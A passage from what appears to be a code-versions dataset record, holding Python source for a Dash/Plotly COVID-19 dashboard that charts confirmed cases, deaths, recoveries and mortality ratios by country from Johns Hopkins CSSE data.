'<b>%{y}</b><br>' +\n '<br>Observed Case Mortaility Pct: %{text}&#37;<br>',\n showlegend=False)\n figmort.append(trace)\n layout_global = go.Layout(yaxis={'title': 'Country / Region',\n 'fixedrange': True, 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Observed Case - Mortality Ratio', xaxis={'title':\n '% Mortality by Confirmed Cases 
(Top 20 Countries)', 'range': [\n 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=750, hovermode='closest')\n fig_global = {'data': figmort, 'layout': layout_global}\n return fig_global\n elif select_global == 'Recoveries vs. Deaths By Country':\n figscat = []\n rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100)\n ].reset_index()\n for i in range(len(rc)):\n scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i,\n 'Recovered']], mode='markers+text', text=[rc.loc[i,\n 'Country_Region']], marker_color=colors_dict_global[rc.loc[\n i, 'Continent']], showlegend=False, marker=dict(size=12,\n line_width=1, opacity=0.75), hovertemplate=\n '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' +\n 'Deaths: %{x}<br>', textposition='bottom center', textfont=\n dict(size=10, color='rgba(0, 0, 0, 0.6)'))\n figscat.append(scat)\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(),\n 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25,\n line=dict(color='grey', width=1), text=[\n '# of Deaths = # of Recoveries'], hovertemplate=\n '<b># of Deaths = # of Recoveries</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Recoveries for Every Death',\n opacity=0.25, line=dict(color='green', width=3, dash='dash'),\n text=['2 Recoveries for Every Death'], hovertemplate=\n '<b>2 Recoveries for Every Death</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Deaths for Every Recovery',\n opacity=0.25, line=dict(color='firebrick', width=3, dash='dash'\n ), text=['2 Deaths for Every Recovery'], hovertemplate=\n 
'<b>2 Deaths for Every Recovery</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Recoveries',\n 'fixedrange': True, 'automargin': True, 'range': [np.log10(100),\n np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log',\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'dtick': 1, 'showline': True, 'mirror': False}, title=\n 'Recoveries vs. Deaths, By Country', xaxis={'title':\n 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100),\n np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth':\n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, height=750, hovermode='closest'\n )\n fig_global = {'data': figscat, 'layout': layout_global}\n return fig_global\n\n\n@app.callback([Output(component_id='main-dropdown-2', component_property=\n 'options'), Output(component_id='btext1', component_property='children'\n ), Output(component_id='subplot1', component_property='figure'), Output\n (component_id='btext2', component_property='children'), Output(\n component_id='subplot2', component_property='figure'), Output(\n component_id='btext3', component_property='children'), Output(\n component_id='subplot3', component_property='figure')], [Input(\n component_id='main-dropdown', component_property='value')])\ndef update_country(selected_country):\n if selected_country is None:\n selected_country = 'Canada'\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n 
selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 
'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n else:\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 
Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 
'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n\n\n@app.callback(Output(component_id='box-1', component_property='figure'), [\n Input(component_id='main-dropdown', component_property='value'), Input(\n component_id='main-dropdown-2', component_property='value')])\ndef update_maingraph(selected_country, selected_graph):\n if selected_graph is None and selected_country is None:\n selected_country = 'Canada'\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph is None and selected_country is not None:\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n 
final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph == 'Total and Daily Confirmed Cases':\n figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode=\n 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode=\n 'lines', fill='tozeroy')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n else:\n cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F',\n 'Recovered': '#009E73'}\n figmain_t = 
[go.Bar(name='Total {0}'.format(selected_graph), x=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Date'], y=final_df.loc[final_df['Country_Region'] ==\n selected_country, selected_graph], marker_color=cols_dict[\n selected_graph])]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n selected_graph].max() * 1.1], 'automargin': True, 'showline': \n True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'},\n title='Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n\n\nif __name__ == '__main__':\n app.run_server()\n", "step-4": "<mask token>\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom datetime import date\nfrom COVID19_Diff import calc_diff_country\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.graph_objects as go\nimport math\nurls = [\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv'\n ,\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv'\n ,\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_recovered_global.csv'\n ]\nfinal_df = pd.read_csv('C:/Users/Jordan/Documents/COVID19/final_df.csv')\nfinal_df = calc_diff_country(final_df)\nfinal_df['Date'] = pd.to_datetime(final_df['Date'])\nfinal_df['Country_Region'] = final_df['Country_Region'].astype(str)\ncases_1000_start = 
final_df.loc[(final_df['Confirmed'] >= 1000) & (final_df\n ['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[\n 'Date']\ncases_1000_start = cases_1000_start.reset_index()\ncases_1000_start = cases_1000_start.rename(columns={'Date': 'Start_Date'})\nfinal_df['Country_Region'] = final_df['Country_Region'].str.strip()\ncases_1000_start = pd.merge(cases_1000_start, final_df, on=[\n 'Country_Region'], how='right')\ncases_1000_start['Start_Date'] = pd.to_datetime(cases_1000_start['Start_Date'])\ncases_1000_start['Date'] = pd.to_datetime(cases_1000_start['Date'])\ncases_1000_start = cases_1000_start[cases_1000_start['Start_Date'].notna()]\ncases_1000_start['Days Since 1000 Cases'] = (cases_1000_start['Date'] -\n cases_1000_start['Start_Date']).dt.days\ndeaths_100_start = final_df.loc[(final_df['Deaths'] >= 100) & (final_df[\n 'Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[\n 'Date']\ndeaths_100_start = deaths_100_start.reset_index()\ndeaths_100_start = deaths_100_start.rename(columns={'Date': 'Start_Date'})\nfinal_df['Country_Region'] = final_df['Country_Region'].str.strip()\ndeaths_100_start = pd.merge(deaths_100_start, final_df, on=[\n 'Country_Region'], how='right')\ndeaths_100_start['Start_Date'] = pd.to_datetime(deaths_100_start['Start_Date'])\ndeaths_100_start['Date'] = pd.to_datetime(deaths_100_start['Date'])\ndeaths_100_start = deaths_100_start[deaths_100_start['Start_Date'].notna()]\ndeaths_100_start['Days Since 100 Deaths'] = (deaths_100_start['Date'] -\n deaths_100_start['Start_Date']).dt.days\nmort = final_df.groupby(['Country_Region'])['Date'].max().reset_index()\nmort = pd.merge(mort, final_df, on=['Country_Region', 'Date'], how='left')\nmort['Mortality_Percent'] = mort['Deaths'] / mort['Confirmed'] * 100.0\ncolors_dict_global = {'Europe': '#1D6996', 'Asia': '#CC503E', 'Africa':\n '#94346E', 'North America': '#38A6A5', 'Middle East': '#EDAD08',\n 'South America': '#E17C05', 'Caribbean & Central America': 
'#0F8554',\n 'Oceania': '#73AF48'}\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\nserver = app.server\napp.layout = html.Div(children=[html.H2(children='COVID-19 Dashboard'),\n html.H4(children=\n 'A Basic Dashboard to Help Track the COVID-19 Pandemic'), html.Br(),\n html.H5(children='Global View'), html.P(children=\n 'The Global View highlights how Covid-19 is affecting countries across the world, and how the pandemic is expanding on a country by country basis. The Global View includes the following:'\n ), html.Div([html.Ul([html.Li([html.B(\n 'Cumulative Cases by Country Since First 1000 Cases: '),\n 'This allows us to see how cases are spreading since the first 1000 Cases on a country by country basis'\n ]), html.Li([html.B(\n 'Cumulative Cases by Country Since First 100 Deaths: '),\n 'This allows us to see COVID-19 fatalities since the first 100 Deaths on a country by country basis'\n ]), html.Li([html.B(\n 'Observed Case - Mortality Ratio (Top 20 Countries by Confirmed Cases): '\n ),\n 'This allows us to see the percentage of COVID19 fatalities based on reported cases and deaths. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)'\n ]), html.Li([html.B(\n 'Recoveries vs. Deaths By Country (Countries with over 100 deaths and 100 recoveries: '\n ),\n 'This plots Recoveries against Deaths on a country by country basis. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)'\n ])])], style={'font-size': 12}), html.Br(), dcc.Dropdown(id=\n 'global-dropdown', options=[{'label': y, 'value': y} for y in [\n 'Global Cases Trend', 'Global Deaths Trend',\n '% Mortality by Confirmed Cases (Top 20 Countries)',\n 'Recoveries vs. 
Deaths By Country']], placeholder=\n 'Pick Graphs From Here...'), dcc.Graph(id='global-box-1'), html.Br(),\n html.H5(children='Country View'), html.P(\n 'The Country view allows us to see a closer look on how the COVID-19 Pandemic has expanded. As opposed to a high level aggregation, the Country View provides a day by day time series analysis of the effects of COVID-19. The Country View includes the following:'\n ), html.Div(style={'font-size': 12}, children=[html.Ul([html.Li([html.B\n ('Confirmed: '),\n 'Cumulative Confirmed Cases of COVID-19 since January 22nd, 2020']),\n html.Li([html.B('Recovered: '),\n 'Cumulative Recovered Cases of COVID-19 since January 22nd, 2020']),\n html.Li([html.B('Deaths: '),\n 'Cumulative Deaths from COVID-19 since January 22nd, 2020']), html.Li([\n html.B('Total and Daily Confirmed Cases: '),\n 'Cumulative and Daily Cases Since January 22nd, 2020. This illustrates the curve of daily cases in relation to the total cases for a country'\n ])])]), dcc.Dropdown(id='main-dropdown', options=[{'label': x, 'value':\n x} for x in list(final_df.Country_Region.unique())], placeholder=\n 'Pick a Country From Here...'), dcc.Dropdown(id='main-dropdown-2',\n placeholder='Pick Graphs From Here...'), dcc.Graph(id='box-1'), html.\n Div([html.Div([html.H6(children='Most Recent New Cases'), html.H1(id=\n 'btext1'), dcc.Graph(id='subplot1')], className='four columns', style={\n 'color': '#648FFF'}), html.Div([html.H6(children=\n 'Most Recent Daily Deaths'), html.H1(id='btext2'), dcc.Graph(id=\n 'subplot2')], className='four columns', style={'color': '#DC267F'}),\n html.Div([html.H6(children='Most Recent Daily Recovered'), html.H1(id=\n 'btext3'), dcc.Graph(id='subplot3')], className='four columns', style={\n 'color': '#009E73', 'layout': 'right'})], className='row')])\n\n\n@app.callback(Output(component_id='global-box-1', component_property=\n 'figure'), [Input(component_id='global-dropdown', component_property=\n 'value')])\ndef 
global_update(select_global):\n if select_global == 'Global Cases Trend' or select_global is None:\n fig1000 = []\n anno = []\n for group, dataframe in cases_1000_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 1000 Cases'])\n trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di\n ['Confirmed'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np\n .log10(int(di['Confirmed'].max())), 'xref': 'x', 'yref':\n 'y', 'showarrow': False, 'text': list(di.loc[:,\n 'Country_Region'])[0], 'xanchor': 'right', 'yanchor':\n 'middle', 'align': 'center', 'font': {'size': 8, 'color':\n 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1,\n 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig1000.append(trace)\n anno.append(a)\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 *\n i)) for i in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Cases Double Every 3 Days'], hovertemplate=\n '<b>Cases Double Every 3 Days</b>', showlegend=True))\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 *\n i)) for i in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Cases Double Every 7 Days'], hovertemplate=\n '<b>Cases Double Every 7 Days</b>', 
showlegend=True))\n layout_global = go.Layout(yaxis={'title':\n 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10\n (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 'log',\n 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black',\n 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': \n False}, title='Overall Confirmed Cases', xaxis={'title':\n 'Days Since First 1000 Cases', 'range': [0, cases_1000_start[\n 'Days Since 1000 Cases'].max()], 'fixedrange': True,\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig1000, 'layout': layout_global}\n return fig_global\n elif select_global == 'Global Deaths Trend':\n fig100 = []\n anno = []\n for group, dataframe in deaths_100_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 100 Deaths'])\n trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di\n ['Deaths'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 100 Deaths'].max() + 1.5), 'y': np\n .log10(int(di['Deaths'].max())), 'xref': 'x', 'yref': 'y',\n 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'\n ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align':\n 'center', 'font': {'size': 8, 'color': 'black'},\n 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1,\n 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig100.append(trace)\n anno.append(a)\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 
'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Deaths Double Every 3 Days'], hovertemplate=\n '<b>Deaths Double Every 3 Days</b>', showlegend=True))\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Deaths Double Every 7 Days'], hovertemplate=\n '<b>Deaths Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Deaths',\n 'range': [np.log10(100), np.log10(cases_1000_start['Deaths'].\n max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': \n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, title='Overall Deaths',\n xaxis={'title': 'Days Since First 100 deaths', 'range': [0,\n deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange':\n True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig100, 'layout': layout_global}\n return fig_global\n elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)':\n figmort = []\n anno = []\n m = mort.sort_values(by=['Confirmed'], ascending=False).head(20)\n m = m.sort_values(by=['Mortality_Percent'], ascending=True\n ).reset_index()\n for i in range(len(m)):\n m1 = m.loc[i, 'Country_Region']\n m2 = m.loc[i, 'Mortality_Percent']\n trace = go.Bar(name='Observed Case - Mortality Ratio', x=[m2],\n y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)],\n orientation='h', textposition='auto', marker=dict(color=\n '#FFB000', opacity=0.6, line=dict(color=\n 'rgba(255,176,0, 1)', width=1)), hovertemplate=\n '<b>%{y}</b><br>' +\n 
'<br>Observed Case Mortaility Pct: %{text}&#37;<br>',\n showlegend=False)\n figmort.append(trace)\n layout_global = go.Layout(yaxis={'title': 'Country / Region',\n 'fixedrange': True, 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Observed Case - Mortality Ratio', xaxis={'title':\n '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [\n 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=750, hovermode='closest')\n fig_global = {'data': figmort, 'layout': layout_global}\n return fig_global\n elif select_global == 'Recoveries vs. Deaths By Country':\n figscat = []\n rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100)\n ].reset_index()\n for i in range(len(rc)):\n scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i,\n 'Recovered']], mode='markers+text', text=[rc.loc[i,\n 'Country_Region']], marker_color=colors_dict_global[rc.loc[\n i, 'Continent']], showlegend=False, marker=dict(size=12,\n line_width=1, opacity=0.75), hovertemplate=\n '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' +\n 'Deaths: %{x}<br>', textposition='bottom center', textfont=\n dict(size=10, color='rgba(0, 0, 0, 0.6)'))\n figscat.append(scat)\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(),\n 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25,\n line=dict(color='grey', width=1), text=[\n '# of Deaths = # of Recoveries'], hovertemplate=\n '<b># of Deaths = # of Recoveries</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Recoveries for Every Death',\n opacity=0.25, line=dict(color='green', width=3, dash='dash'),\n text=['2 Recoveries for Every Death'], hovertemplate=\n '<b>2 
